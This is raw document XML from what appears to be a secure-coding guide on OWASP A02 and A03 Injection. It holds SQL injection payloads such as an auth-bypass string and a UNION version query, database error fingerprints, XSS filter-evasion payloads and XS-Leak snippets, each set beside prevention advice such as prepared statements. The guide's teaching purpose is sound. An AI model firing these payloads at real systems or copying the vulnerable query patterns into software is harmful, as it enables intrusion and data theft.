                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if (!match) return res.status(401).json({ error: 'Invalid credentials' });</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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A02 Key Takeaways</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Never hardcode secrets — use environment variables or a secrets manager</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Use bcrypt/scrypt/Argon2id for password hashing, never MD5 or SHA-1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Enforce HTTPS everywhere; set HSTS headers</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Scan your repo history for accidentally committed credentials</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Use AES-256-GCM for encrypting sensitive data at rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A03:2021 —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data loss / Account takeover / RCE</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Injection vulnerabilities occur when untrusted data is sent to an interpreter as part of a command or query. The two most prevalent forms in web applications are SQL Injection (SQLi) and Cross-Site Scripting (XSS). Injection flaws can allow attackers to read, modify, or delete all data in a database, bypass authentication, or execute code in users' browsers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When user input is concatenated directly into a SQL query, an attacker can inject SQL syntax to alter the query's logic. SQL injection attacks are still reported in real applications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Incident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guess.com — credit card numbers of customers exposed</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mysql.com itself compromised via SQL injection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Przelewy24 plugin for PrestaShop and WooCommerce vulnerable to SQLi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Vulnerable SQL query construction</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// VULNERABLE: String concatenation in SQL query</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">const query = "SELECT * FROM users WHERE username='" + username + "'";</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Input: ' OR '1'='1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Result: SELECT * FROM users WHERE username='' OR '1'='1'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Returns all users — authentication bypassed</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Another payload to extract database version:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Input: ' UNION SELECT version(),null,null --</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// Result reveals: MySQL 8.0.32, MS SQL 2019, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Database Fingerprinting via Error Messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verbose database error messages reveal the database type and version, helping attackers craft precise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Database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Error Message Pattern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MySQL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have an error in your SQL syntax; check the manual...</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MS SQL Server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Client error '80040e14'</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failed: ERROR: syntax error at or near...</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Oracle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ORA-00933: SQL command not properly ended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention: Prepared Statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The most effective defence against SQL injection is using parameterised queries / prepared statements. The database driver handles escaping, so user input can never alter query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Prepared statements in PHP and Java</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// VULNERABLE — PHP with string concatenation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$query = "SELECT * FROM users WHERE email='" . $_POST['email'] . "'";</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SECURE — PHP PDO with prepared statement</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$pdo = new PDO(/* dsn, user, pass */);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$stmt = $pdo-&gt;prepare('SELECT * FROM users WHERE email = ?');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$stmt-&gt;execute([ $_POST['email'] ]);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$user = $stmt-&gt;fetch();</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SECURE — Java PreparedStatement</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PreparedStatement pstmt = con.prepareStatement(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "UPDATE employees SET salary = ? WHERE id = ?"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pstmt.setBigDecimal(1, newSalary);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pstmt.setInt(2, employeeId);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pstmt.execute();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS allows attackers to inject malicious scripts into web pages viewed by other users. There are three main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XSS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Reflected XSS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in URL; server reflects it back in response without sanitisation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Stored XSS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saved to database; executed every time victims load the affected page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DOM-based XSS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processed entirely in the browser's DOM by client-side JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers use filter evasion techniques to bypass naive input filters. Browsers accept many non-standard but valid HTML/JavaScript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XSS payload variations and evasion techniques</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!-- Basic XSS payload --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;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Evasion: using onerror event on broken image --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;img src=/ onerror="alert(String.fromCharCode(88,83,83))"&gt;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Evasion: encoded javascript: URI --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;img src="jav&amp;#x09;ascript:alert('XSS');"&gt;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Evasion: event handlers with special characters --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;body onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert('XSS')&gt;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Evasion: CSS-based XSS (legacy browsers) --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;style&gt;li {list-style-image: url("javascript:alert('XSS')");}&lt;/style&gt;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JSFuck: obfuscated JS using only []()!+ characters --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+...]  // evaluates to alert(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced XSS: XS-Leaks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Beyond basic script injection, XS-Leaks are a class of cross-origin attacks that infer sensitive information about users' interactions with other sites by observing browser side-channels (frame count, focus behaviour,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XS-Leak examples (cross-origin information inference)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// XS-Leak: detecting if a user is logged into another site</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">var s = document.createElement('script');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">s.src = 'https://target-site.com/api/user-data.json';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">s.onload = () =&gt; console.log('User IS logged in');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">s.onerror = () =&gt; console.log('User is NOT logged in');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">document.head.appendChild(s);</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XS-Leak: counting iframes to infer search result count</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">var ifr = document.createElement('iframe');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ifr.src = 'https://target.com/search?q=secret';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">document.body.appendChild(ifr);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">setTimeout(() =&gt; console.log(ifr.contentWindow.length + ' results'), 2000);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS Prevention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Defence requires multiple layers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Output encoding: encode all user-supplied data before inserting into HTML, JavaScript, CSS, or URL contexts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
